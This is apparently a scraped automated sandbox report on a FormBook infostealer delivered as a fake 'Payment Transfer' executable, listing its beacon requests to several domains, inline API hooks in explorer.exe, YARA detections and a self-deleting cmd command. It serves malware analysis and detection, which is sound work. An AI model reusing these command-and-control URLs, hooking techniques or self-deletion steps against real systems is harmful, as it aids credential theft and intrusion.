                                                            X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViPPFLGwJgVO8FUAmFQQjPN,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRaluwwFBK7ql/Bn4PhplCINftSbYW2c4RZurCpWsQpzdtD3fKEXQvQlSAkB/lstal9R9ihGhmRXRA447Fw/kR9qdQ=,2UNV7KOq4oGjA5+PKsX47PP4j9yVJ2TZnllsg4qz4cE=,l7Ey5khejq81S7sxGe5Nk7KjdHHF98Vyi2aTDlfeOxdXz5t7NzGxeu2CXkk1aB7ZGlsroP2XR0N+rjgJK/PU9A==,4EmzKGKKpFffqfFwZRPY8dyCbNiRyM7+ZTNlULwu4/eFl6yP+RXtdTBOj4nQbF2lOOC/fp3nJ3UUnFruSOQYow==
                                                            Cache-Control: no-cache
                                                            Expires: -1
                                                            Server: Pepyaka/1.19.0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.349735210.152.86.13280C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:48:14.400055885 CET5114OUTGET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.cvmjqcid.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:14.694118977 CET5115INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.16.1
                                                            Date: Tue, 23 Feb 2021 08:48:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: close
                                                            Location: http://merukore.jp/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.34973650.116.112.4380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:48:35.246251106 CET5116OUTGET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.jaemagreci.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:36.268591881 CET5117INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Feb 2021 08:48:35 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://jaemagreci.com
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.34973934.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:48:54.032861948 CET5136OUTGET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.sweetpopntreatz.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:54.174190044 CET5137INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Tue, 23 Feb 2021 08:48:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6031584e-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.349740198.52.105.12380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:49:16.624357939 CET5138OUTGET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.long9000.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:16.870922089 CET5139INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:44:23 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                            Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.349748185.199.108.15380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:49:37.345757961 CET5531OUTGET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.soheilvaseghi.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:37.472671032 CET5533INHTTP/1.1 301 Moved Permanently
                                                            Server: GitHub.com
                                                            Content-Type: text/html
                                                            Location: https://soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L
                                                            X-GitHub-Request-Id: 2C62:B000:9F860:ADCCB:6034C1A1
                                                            Content-Length: 162
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 23 Feb 2021 08:49:37 GMT
                                                            Via: 1.1 varnish
                                                            Age: 0
                                                            Connection: close
                                                            X-Served-By: cache-hhn4039-HHN
                                                            X-Cache: MISS
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1614070177.383340,VS0,VE84
                                                            Vary: Accept-Encoding
                                                            X-Fastly-Request-ID: 28473c359bf380142872393ca46bb19149a93093
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.2.349752176.74.27.13780C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:49:57.812186003 CET6008OUTGET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.gannahealing.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:57.873881102 CET6009INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:49:57 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Content-Length: 343
                                                            Connection: close
                                                            Location: http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L
                                                            Cache-Control: max-age=172800
                                                            Expires: Thu, 25 Feb 2021 08:49:57 GMT
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 6e 6e 61 68 65 61 6c 69 6e 67 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 62 6c 72 3f 4f 68 4e 68 41 3d 31 44 36 63 73 66 61 44 44 37 67 34 74 33 51 39 46 38 4c 48 4e 57 69 47 46 71 6e 73 75 64 51 79 41 35 47 48 70 6c 2f 35 62 32 6e 44 4a 77 5a 49 6b 57 55 37 36 69 78 73 37 6a 41 62 4d 6c 76 6d 31 79 6d 59 26 61 6d 70 3b 59 6e 3d 79 62 64 44 6d 66 64 50 54 62 41 54 38 4c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&amp;Yn=ybdDmfdPTbAT8L">here</a>.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.2.349753198.27.88.11180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:50:18.432307005 CET6010OUTGET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.olgadalila.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:50:18.584054947 CET6010INHTTP/1.1 502 Bad Gateway
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:50:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8192.168.2.349754164.155.144.22080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:50:39.257392883 CET6011OUTGET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.zomapa.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:50:39.465549946 CET6011INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:50:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 1.0


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            PeekMessageAINLINEexplorer.exe
                                                            PeekMessageWINLINEexplorer.exe
                                                            GetMessageWINLINEexplorer.exe
                                                            GetMessageAINLINEexplorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: user32.dll
                                                            Function NameHook TypeNew Data
                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:09:46:47
                                                            Start date:23/02/2021
                                                            Path:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
                                                            Imagebase:0x7ffb73670000
                                                            File size:716288 bytes
                                                            MD5 hash:5F1C9C4A7BC24C3D39A5A3834BA7BB8E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:09:46:55
                                                            Start date:23/02/2021
                                                            Path:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Imagebase:0x7ffb73670000
                                                            File size:716288 bytes
                                                            MD5 hash:5F1C9C4A7BC24C3D39A5A3834BA7BB8E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:09:46:57
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:09:47:11
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                            Imagebase:0x330000
                                                            File size:3611360 bytes
                                                            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:09:47:15
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
                                                            Imagebase:0x1d0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:09:47:15
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6b2800000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >